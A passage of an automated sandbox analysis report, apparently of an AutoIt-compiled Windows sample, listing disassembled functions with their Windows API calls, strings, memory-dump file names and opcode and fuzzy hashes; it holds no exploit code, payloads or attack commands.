                                    • Opcode Fuzzy Hash: 90ab693c7abe81b2fd9a64eec182ed1a4fd0259cd70e1d50dc61269124c4c525
                                    • Instruction Fuzzy Hash: B4419D34604244AFDB22CF28C499B947BF4FF85710F1841B9E9489FAE3C732A956DB51
                                    Function 008F709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,008F4E41,?,?,00000000,00000001), ref: 008F70AC
                                      • Part of subcall function 008F39A0: GetWindowRect.USER32(?,?), ref: 008F39B3
                                    • GetDesktopWindow.USER32 ref: 008F70D6
                                    • GetWindowRect.USER32(00000000), ref: 008F70DD
                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 008F710F
                                      • Part of subcall function 008E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E52BC
                                    • GetCursorPos.USER32(?), ref: 008F713B
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008F7199
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                    • String ID:
                                    • API String ID: 4137160315-0
                                    • Opcode ID: a73f3256cc721085d06bb31b79055e889797276b2ea0c802da9587f90bf6506f
                                    • Instruction ID: 491e78adb4c97929eddab1b0eeba121d186060641763e6f64bcdbeb71b23d59f
                                    • Opcode Fuzzy Hash: a73f3256cc721085d06bb31b79055e889797276b2ea0c802da9587f90bf6506f
                                    • Instruction Fuzzy Hash: A631B272509309AFD720DF24CC49BABB7EAFF89314F000919F585D7191DA71EA49CB92
                                    Function 008EEB23 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                      • Part of subcall function 0089FC86: _wcscpy.LIBCMT ref: 0089FCA9
                                    • _wcstok.LIBCMT ref: 008EEC94
                                    • _wcscpy.LIBCMT ref: 008EED23
                                    • _memset.LIBCMT ref: 008EED56
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                    • String ID: X
                                    • API String ID: 774024439-3081909835
                                    • Opcode ID: 755d39478f7adc7791bd7f466c5001b002395c6942c7787ccf8cd17edf1f0e4f
                                    • Instruction ID: cfa481e2cdb10322f27b16d7832a1f301f81ef19e7aa9ca680037f827257471e
                                    • Opcode Fuzzy Hash: 755d39478f7adc7791bd7f466c5001b002395c6942c7787ccf8cd17edf1f0e4f
                                    • Instruction Fuzzy Hash: 22C13A715083519FC764EF28D881A6AB7E4FF86314F14492DF899DB2A2DB30ED45CB82
                                    Function 008D8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008D80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008D80C0
                                      • Part of subcall function 008D80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008D80CA
                                      • Part of subcall function 008D80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008D80D9
                                      • Part of subcall function 008D80A9: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008D80E0
                                      • Part of subcall function 008D80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008D80F6
                                    • GetLengthSid.ADVAPI32(?,00000000,008D842F), ref: 008D88CA
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008D88D6
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008D88DD
                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 008D88F6
                                    • GetProcessHeap.KERNEL32(00000000,00000000,008D842F), ref: 008D890A
                                    • HeapFree.KERNEL32(00000000), ref: 008D8911
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                    • String ID:
                                    • API String ID: 169236558-0
                                    • Opcode ID: fdffe59a1eee648b9f2181c93a41710ae955ca251d5e2c8a52d4ef6f5dc0bb09
                                    • Instruction ID: d7ae52b5c30837527a5f2184b57a3007c31622eddc3a150ee8fa90d165cfef0d
                                    • Opcode Fuzzy Hash: fdffe59a1eee648b9f2181c93a41710ae955ca251d5e2c8a52d4ef6f5dc0bb09
                                    • Instruction Fuzzy Hash: A6116D71515209FFDB209FA4DC29FBE7B79FB45316F10422AE885D7210CB32AA44EB61
                                    Function 008DB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDC.USER32(00000000), ref: 008DB7B5
                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 008DB7C6
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008DB7CD
                                    • ReleaseDC.USER32(00000000,00000000), ref: 008DB7D5
                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 008DB7EC
                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 008DB7FE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CapsDevice$Release
                                    • String ID:
                                    • API String ID: 1035833867-0
                                    • Opcode ID: c324fc5764e436c2037ad7b2df17e99a0f2afebad5a2064145810729c4e7e83c
                                    • Instruction ID: 4c73ed5bfcab413fbe21cd90f2693e44d73078ba6e2efd3eee3e2b4f4a6955e0
                                    • Opcode Fuzzy Hash: c324fc5764e436c2037ad7b2df17e99a0f2afebad5a2064145810729c4e7e83c
                                    • Instruction Fuzzy Hash: CB018475E04609BFEF109BA69C45A5EBFB8EB48311F004076FA08E7391D6319D00CF91
                                    Function 008A0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A0193
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 008A019B
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A01A6
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A01B1
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 008A01B9
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 008A01C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    • Opcode ID: c069bdf56114c9912dedbcc37c4a7db2837ae170db7ce178728141ec7771ee23
                                    • Instruction ID: f28b384e10350ffd9a44f37633fc6fa819085a694c9beae79b76f30df141b19a
                                    • Opcode Fuzzy Hash: c069bdf56114c9912dedbcc37c4a7db2837ae170db7ce178728141ec7771ee23
                                    • Instruction Fuzzy Hash: 35016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                    Function 008E53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E53F9
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008E540F
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 008E541E
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E542D
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E5437
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E543E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    • Opcode ID: 3a2e6ce6df0b9d2f1ab10d25040f45f4c379fdaa2d47b99f6854cc81d8a9779f
                                    • Instruction ID: 134a6b183530748da6600fb1d595e23335ca92e2288fe4500d6ba48c49abc3e0
                                    • Opcode Fuzzy Hash: 3a2e6ce6df0b9d2f1ab10d25040f45f4c379fdaa2d47b99f6854cc81d8a9779f
                                    • Instruction Fuzzy Hash: D0F06D32258558BFE3305BA2DC0DEAB7A7CEBC6B11F000169FA04D10909AA11B0196B5
                                    Function 008E7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,?), ref: 008E7243
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 008E7254
                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00890EE4,?,?), ref: 008E7261
                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00890EE4,?,?), ref: 008E726E
                                      • Part of subcall function 008E6C35: CloseHandle.KERNEL32(00000000,?,008E727B,?,00890EE4,?,?), ref: 008E6C3F
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 008E7281
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 008E7288
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    • Opcode ID: 606fdc38c681bc19b398265b412fe13b7e3fa5d527d2ff9cff47067c528416d5
                                    • Instruction ID: 1878dd3dfb8fa31bedb5152aa1069dcda0644f73be0529ad9a1213d732772ff2
                                    • Opcode Fuzzy Hash: 606fdc38c681bc19b398265b412fe13b7e3fa5d527d2ff9cff47067c528416d5
                                    • Instruction Fuzzy Hash: A4F0E236058702EFE7212B28EC4C9DB7739FF05702B100131F203D04A0CB761A40EB50
                                    Function 008F85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 008F8613
                                    • CharUpperBuffW.USER32(?,?), ref: 008F8722
                                    • VariantClear.OLEAUT32(?), ref: 008F889A
                                      • Part of subcall function 008E7562: VariantInit.OLEAUT32(00000000), ref: 008E75A2
                                      • Part of subcall function 008E7562: VariantCopy.OLEAUT32(00000000,?), ref: 008E75AB
                                      • Part of subcall function 008E7562: VariantClear.OLEAUT32(00000000), ref: 008E75B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4237274167-1221869570
                                    • Opcode ID: c412135c02e5d0beb8157fbee11e08824611faf7f0ae4e005991a45a579609d5
                                    • Instruction ID: 1caf6be98833376d2bb24af04c8f62f6ad2604dda563a03c579ef4c04044f9b3
                                    • Opcode Fuzzy Hash: c412135c02e5d0beb8157fbee11e08824611faf7f0ae4e005991a45a579609d5
                                    • Instruction Fuzzy Hash: 7C914671608305DFC710EF28C48496ABBE4FF89754F14896EF99ACB261DB30E905CB92
                                    Function 008E2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0089FC86: _wcscpy.LIBCMT ref: 0089FCA9
                                    • _memset.LIBCMT ref: 008E2B87
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008E2BB6
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008E2C69
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008E2C97
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                    • String ID: 0
                                    • API String ID: 4152858687-4108050209
                                    • Opcode ID: 9d145af89bdc911f9bc2aec2cbda44e18d07dc782a019945ef83d7efb0e09d8a
                                    • Instruction ID: 9a57dc1256f7728f8e2cf795288517881bc57a15f6e1dc13153dd592a1f40c84
                                    • Opcode Fuzzy Hash: 9d145af89bdc911f9bc2aec2cbda44e18d07dc782a019945ef83d7efb0e09d8a
                                    • Instruction Fuzzy Hash: 0551CE711083809BD7249F2AC845A6FB7ECFF9A324F240A2DF895D2291DB70CD44DB52
                                    Function 008DD56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 008DD5D4
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008DD60A
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008DD61B
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008DD69D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 753597075-1075368562
                                    • Opcode ID: d7b33942d952c1f12bf4f3e0684774c61f59183b9f6ff62073182c0e01f1fe6c
                                    • Instruction ID: e9bd4a6cac72aab85e15d29678d65ec2b5fb17649916fa7f80c8f20f41141beb
                                    • Opcode Fuzzy Hash: d7b33942d952c1f12bf4f3e0684774c61f59183b9f6ff62073182c0e01f1fe6c
                                    • Instruction Fuzzy Hash: 1341AEB1600304EFDB15CF64D884A9ABBA9FF54314F1182AAAC09DF305D7B0DA40CBE0
                                    Function 008E2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 008E27C0
                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008E27DC
                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 008E2822
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00945890,00000000), ref: 008E286B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem_memset
                                    • String ID: 0
                                    • API String ID: 1173514356-4108050209
                                    • Opcode ID: e1f279325e3fab6c0e99ab04e54c6167e2e927b1aca332a313f4a9d717eba635
                                    • Instruction ID: f4dcb111e96b7e38f92310534c896e02a6284074418a2ae063fe8184e0f15e49
                                    • Opcode Fuzzy Hash: e1f279325e3fab6c0e99ab04e54c6167e2e927b1aca332a313f4a9d717eba635
                                    • Instruction Fuzzy Hash: D5417C702043919FD724DF2ACC44B2ABBE8FF86314F144A6DF9A5D7292D730A905CB52
                                    Function 008FD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008FD7C5
                                      • Part of subcall function 0088784B: _memmove.LIBCMT ref: 00887899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharLower_memmove
                                    • String ID: cdecl$none$stdcall$winapi
                                    • API String ID: 3425801089-567219261
                                    • Opcode ID: 85dbb473f93e422e89dd0d882e9fc8fda456033023aaa41b9d9ca952e0067ee7
                                    • Instruction ID: af95bece6cb498b10d0e329f93e9645ba77235cbf9f771b497f9bbb3b693bda7
                                    • Opcode Fuzzy Hash: 85dbb473f93e422e89dd0d882e9fc8fda456033023aaa41b9d9ca952e0067ee7
                                    • Instruction Fuzzy Hash: 45319A7191421DABDF10EF68C8519BEB3B5FF05320B108A29E926E76D1EB71AD05CB80
                                    Function 008D8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 008DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008DAABC
                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008D8F14
                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008D8F27
                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 008D8F57
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$_memmove$ClassName
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 365058703-1403004172
                                    • Opcode ID: b25ca70f43d846431cc3d96a4b11d63be831fb056bf718316bec28ab572090d0
                                    • Instruction ID: 3546aed4f6ee155ae97952e4504cf09dca4ced78bf1834ce99fda76015abc86f
                                    • Opcode Fuzzy Hash: b25ca70f43d846431cc3d96a4b11d63be831fb056bf718316bec28ab572090d0
                                    • Instruction Fuzzy Hash: 4C21D272A04108BEDB24ABA49C85DFEB779EF45324B14461AF421E72E1DE3549099A11
